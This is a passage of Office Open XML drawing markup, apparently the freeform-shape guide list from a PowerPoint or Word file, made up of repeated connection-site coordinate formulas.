              <a:gd name="connsiteY43" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY47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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY46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5 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY45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5 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY44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5 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY43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090259 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 2779492 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY42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090259 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 2779492 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY41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090259 w 4123786"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 2779492 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY40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090259 w 4123786"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY39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090259 w 4123786"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 7915797 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4126269"/>
              <a:gd name="connsiteY0" fmla="*/ 7915797 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 7600 w 4126269"/>
              <a:gd name="connsiteY1" fmla="*/ 7873197 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 4439 w 4126269"/>
              <a:gd name="connsiteY2" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 12582 w 4126269"/>
              <a:gd name="connsiteY3" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 20085 w 4126269"/>
              <a:gd name="connsiteY4" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 28081 w 4126269"/>
              <a:gd name="connsiteY5" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY6" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY7" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 27793 w 4126269"/>
              <a:gd name="connsiteY8" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY9" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 26802 w 4126269"/>
              <a:gd name="connsiteY10" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY11" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 27363 w 4126269"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4126269"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4126269"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 18269 w 4126269"/>
              <a:gd name="connsiteY15" fmla="*/ 6928626 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 27200 w 4126269"/>
              <a:gd name="connsiteY16" fmla="*/ 6855869 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 21919 w 4126269"/>
              <a:gd name="connsiteY17" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 47162 w 4126269"/>
              <a:gd name="connsiteY18" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 68017 w 4126269"/>
              <a:gd name="connsiteY19" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4090259 w 4126269"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4126269"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123785 w 4126269"/>
              <a:gd name="connsiteY22" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4126269"/>
              <a:gd name="connsiteY23" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4090258 w 4126269"/>
              <a:gd name="connsiteY24" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4072751 w 4126269"/>
              <a:gd name="connsiteY25" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4072751 w 4126269"/>
              <a:gd name="connsiteY26" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 68003 w 4126269"/>
              <a:gd name="connsiteY27" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY28" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY29" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 19986 w 4126269"/>
              <a:gd name="connsiteY30" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY31" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY32" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY33" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 19292 w 4126269"/>
              <a:gd name="connsiteY34" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 6414 w 4126269"/>
              <a:gd name="connsiteY35" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 862 w 4126269"/>
              <a:gd name="connsiteY36" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 0 w 4126269"/>
              <a:gd name="connsiteY37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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 18269 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 6928626 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 27200 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 6855869 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 47162 w 4127976"/>
